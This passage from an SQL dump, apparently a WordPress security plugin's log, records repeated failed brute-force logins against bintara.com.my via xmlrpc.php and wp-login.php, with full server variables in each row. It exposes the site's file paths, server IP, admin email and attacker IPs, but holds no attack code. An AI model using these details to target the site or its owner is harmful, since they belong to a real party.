06:19:00',17740416,19230384,'https://bintara.com.my/wp-login.php',1,0,'178.128.212.173'),(24427,0,'brute_force','invalid-login::username-[login]','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:7:\"[login]\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"475\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"178.128.212.173\";s:11:\"REMOTE_PORT\";s:5:\"58078\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYB61tVIJ66zPtjtaf0ZrQAAAVE\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568701142.6531\";s:12:\"REQUEST_TIME\";s:10:\"1568701142\";}}','notice','2019-09-17 06:19:04','2019-09-17 06:19:03',18256408,19555304,'https://bintara.com.my/xmlrpc.php',1,0,'178.128.212.173'),(24428,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"92\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"136.243.50.70\";s:11:\"REMOTE_PORT\";s:5:\"49748\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYB819K-omY048@iBsM1GQAAANc\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568701655.2091\";s:12:\"REQUEST_TIME\";s:10:\"1568701655\";}}','notice','2019-09-17 06:27:36','2019-09-17 06:27:35',17740800,19231784,'https://bintara.com.my/wp-login.php',1,0,'136.243.50.70'),(24429,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"136.243.50.70\";s:11:\"REMOTE_PORT\";s:5:\"50560\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYB82tVIJ66zPtjtaf0cbwAAAVg\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568701658.0979\";s:12:\"REQUEST_TIME\";s:10:\"1568701658\";}}','notice','2019-09-17 06:27:39','2019-09-17 06:27:38',18256824,19555648,'https://bintara.com.my/xmlrpc.php',1,0,'136.243.50.70'),(24430,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"148.72.23.181\";s:11:\"REMOTE_PORT\";s:5:\"45258\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYB9o9VIJ66zPtjtaf0dlgAAAUk\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568701859.6652\";s:12:\"REQUEST_TIME\";s:10:\"1568701859\";}}','notice','2019-09-17 06:31:01','2019-09-17 06:31:00',17740800,19231784,'https://bintara.com.my/wp-login.php',1,0,'148.72.23.181'),(24431,0,'brute_force','invalid-login::username-[login]','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:7:\"[login]\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"475\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"148.72.23.181\";s:11:\"REMOTE_PORT\";s:5:\"45742\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYB9ptVIJ66zPtjtaf0dngAAAVI\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568701862.9931\";s:12:\"REQUEST_TIME\";s:10:\"1568701862\";}}','notice','2019-09-17 06:31:04','2019-09-17 06:31:03',18256728,19555648,'https://bintara.com.my/xmlrpc.php',1,0,'148.72.23.181'),(24432,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"92\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"142.93.37.180\";s:11:\"REMOTE_PORT\";s:5:\"33702\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYB@z9VIJ66zPtjtaf0fNgAAAVQ\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568702159.6905\";s:12:\"REQUEST_TIME\";s:10:\"1568702159\";}}','notice','2019-09-17 06:36:01','2019-09-17 06:36:00',17740504,19232440,'https://bintara.com.my/wp-login.php',1,0,'142.93.37.180'),(24433,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"142.93.37.180\";s:11:\"REMOTE_PORT\";s:5:\"34918\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYB@1x@uZ4OC5N1Fn8FOIQAAAIY\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568702168.0961\";s:12:\"REQUEST_TIME\";s:10:\"1568702168\";}}','notice','2019-09-17 06:36:09','2019-09-17 06:36:08',18257856,19557080,'https://bintara.com.my/xmlrpc.php',1,0,'142.93.37.180'),(24434,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"85\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"103.22.250.194\";s:11:\"REMOTE_PORT\";s:5:\"57708\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYCAttVIJ66zPtjtaf0icQAAAUA\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568702646.8912\";s:12:\"REQUEST_TIME\";s:10:\"1568702646\";}}','notice','2019-09-17 06:44:08','2019-09-17 06:44:07',17741840,19233208,'https://bintara.com.my/wp-login.php',1,0,'103.22.250.194'),(24435,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"103.22.250.194\";s:11:\"REMOTE_PORT\";s:5:\"59178\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYCAvNK-omY048@iBsM2YwAAANQ\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568702652.2279\";s:12:\"REQUEST_TIME\";s:10:\"1568702652\";}}','notice','2019-09-17 06:44:13','2019-09-17 